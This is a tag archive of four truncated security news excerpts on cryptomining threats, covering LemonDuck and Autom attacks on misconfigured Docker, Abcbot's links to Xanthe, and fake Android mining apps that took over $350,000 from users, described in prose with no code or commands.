Tag Archive for: Cryptomining

Cryptomining botnet targeting Docker on Linux systems

/in


Credit: Dreamstime

LemonDuck, a well-known cryptomining botnet, is targeting Docker on Linux systems to coin digital money, CloudStrike has reported.

The vendor’s threat research team revealed in a blog written by Manoj Ahuje that the botnet is leveraging Docker APIs exposed to the internet to run malicious containers on Linux systems.

Docker is used to build, run, and mange containerised workloads. Since it runs primarily in the cloud, a misconfigured instance can expose a Docker API to the internet where it can be exploited by a threat actor, who can run a crypto miner inside an outlaw container.

Docker containers a soft target

Mike Parkin, an engineer at Vulcan Cyber, a provider of SaaS for enterprise cyber risk remediation, explains that one of the main ways attackers compromise containerised environments is through misconfigurations, which just shows how many organisations are failing to follow industry best practices.

“There are tools available that can protect these environments from unauthorised use, and workload monitoring tools that can flag unusual activity,” he said in an interview. “The challenge can be coordinating between the development teams and the security teams, but there are risk management tools that can handle that as well.”

Ratan Tipirneni, president and CEO of Tigera, a provider of security and observability for containers, Kubernetes, and cloud, added that while Docker provides a high degree of programmability, flexibility, and automation it has an unintended side effect of increasing the attack surface.

“This is especially true as container technologies get adopted more broadly by the mainstream market,” he said in an interview. “This creates a soft target for adversaries to compromise Docker, since it unlocks a lot of compute power for cryptomining.”

How LemonDuck works

After running its malicious container on an exposed API, LemonDuck downloads an image file named core.png disguised as a bash script, Ahuje explained. Core.png acts as a pivot point for setting up a Linux…

Source…

Abcbot Botnet Linked to Operators of Xanthe Cryptomining malware

/in


Cryptomining malware

New research into the infrastructure behind an emerging DDoS botnet named Abcbot has uncovered links with a cryptocurrency-mining botnet attack that came to light in December 2020.

Attacks involving Abcbot, first disclosed by Qihoo 360’s Netlab security team in November 2021, are triggered via a malicious shell script that targets insecure cloud instances operated by cloud service providers such as Huawei, Tencent, Baidu, and Alibaba Cloud to download malware that co-opts the machine to a botnet, but not before terminating processes from competing threat actors and establishing persistence.

The shell script in question is itself an iteration of an earlier version originally discovered by Trend Micro in October 2021 hitting vulnerable ECS instances inside Huawei Cloud.

Automatic GitHub Backups

But in an interesting twist, continued analysis of the botnet by mapping all known Indicators of Compromise (IoCs), including IP addresses, URLs, and samples, has revealed Abcbot’s code and feature-level similarities to that of a cryptocurrency mining operation dubbed Xanthe that exploited incorrectly-configured Docker implementations to propagate the infection.

Cryptomining malware

“The same threat actor is responsible for both Xanthe and Abcbot and is shifting its objective from mining cryptocurrency on compromised hosts to activities more traditionally associated with botnets, such as DDoS attacks,” Cado Security’s Matt Muir said in a report shared with The Hacker News.

The semantic overlaps between the two malware families range from how the source code is formatted to the names given to the routines, with some functions not only sporting identical names and implementation (e.g., “nameservercheck”) but also having the word “go” appended to the end of the function names (e.g., “filerungo”).

“This could indicate that the Abcbot version of the function has been iterated on several times, with new functionality added at each iteration,” Muir explained.

Prevent Data Breaches

Furthermore, the deep-dive examination of the malware artifacts revealed the botnet’s capability to create as many as four users of their own by using generic, inconspicuous names like “autoupdater,” “logger,” “sysall,” and “system” to avoid detection, and adding them to the sudoers…

Source…

Ongoing Autom Cryptomining Malware Attacks Using Upgraded Evasion Tactics

/in


Cryptomining Campaign

An ongoing crypto mining campaign has upgraded its arsenal while adding new defense evasion tactics that enable the threat actors to conceal the intrusions and fly under the radar, new research published today has revealed.

Since first detected in 2019, a total of 84 attacks against its honeypot servers have been recorded to date, four of which transpired in 2021, according to researchers from DevSecOps and cloud security firm Aqua Security, who have been tracking the malware operation for the past three years. That said, 125 attacks have been spotted in the wild in the third quarter of 2021 alone, signaling that the attacks have not slowed down.

Initial attacks involved executing a malicious command upon running a vanilla image named “alpine:latest” that resulted in the download of a shell script named “autom.sh.”

“Adversaries commonly use vanilla images along with malicious commands to perform their attacks, because most organizations trust the official images and allow their use,” the researchers said in a report shared with The Hacker News. “Over the years, the malicious command that was added to the official image to carry out the attack has barely changed. The main difference is the server from which the shell script autom.sh was downloaded.”

Automatic GitHub Backups

The shell script initiates the attack sequence, enabling the adversary to create a new user account under the name “akay” and upgrade its privileges to a root user, using which arbitrary commands are run on the compromised machine with the goal of mining cryptocurrency.

While early stages of the campaign in 2019 featured no special techniques to hide the mining activity, later versions show the extreme measures its developers have taken to keep it invisible to detection and inspection, chief among them being the ability to disable security mechanisms and retrieve an obfuscated mining shell script that was Base64-encoded five times to get around security tools.

Cryptomining Campaign

Malware campaigns carried out to hijack computers to mine cryptocurrencies have been dominated by multiple threat actors such as Kinsing, which has been found scanning the internet for misconfigured Docker servers to break into the unprotected hosts and install a previously…

Source…

Fake Cryptomining Apps Stole Over $350K From Android Users

/in


Cryptomining has become a lucrative industry, growing more and more mainstream. Now, attackers are trying to grab a bit of that cash with apps that claim to automate it. But when downloaded, the apps don’t do anything except take your money. 

Lookout found that a total of 172 apps, including 25 on Google Play, promised users cloud-based cryptomining services for a fee. In truth, those apps never delivered those services.

Take a look at how these apps succeeded in stealing over $350,000 from nearly 100,000 victims.

Inside the BitScam and CloudScam Apps

Lookout did a deep dive into two types of apps, which they sorted into the BitScam and CloudScam families. All of these used a similar code base and design as one another despite advertising different cryptomining operations.

“They are simply shells to collect money for services that don’t exist,” Lookout reported. 

Lookout’s researchers observed that whoever had created the BitScam apps had done so using a framework that didn’t require programming experience. Both apps asked users to use Google Play’s in-app billing system to purchase cryptomining subscriptions and services. BitScam also allowed users to pay using bitcoin and Ethereum.

Once installed, the apps loaded a dashboard that displayed a fake hash mining rate as well as the amount of coins that the users had supposedly earned. They also informed users that they could increase their hash mining rate by purchasing other services or subscription upgrades.

It was all a ruse, of course. The in-app updates did nothing to change the mining ‘rate’ either.

What’s more, the apps prevented users from withdrawing any of their mined ‘coins’. The programs displayed a message saying that the withdrawal was pending, but in the background, the apps reset the user’s coin balance to zero.

Other Fake Cryptomining Apps

While cryptocurrency is in the public eye more now than when it began, this kind of app has been around for years. Back in 2018, for instance, security researcher Lukas Stefanko discovered four apps that all impersonated cryptocurrency services. They leveraged that guise to steal users’ cryptocurrency wallet…

Source…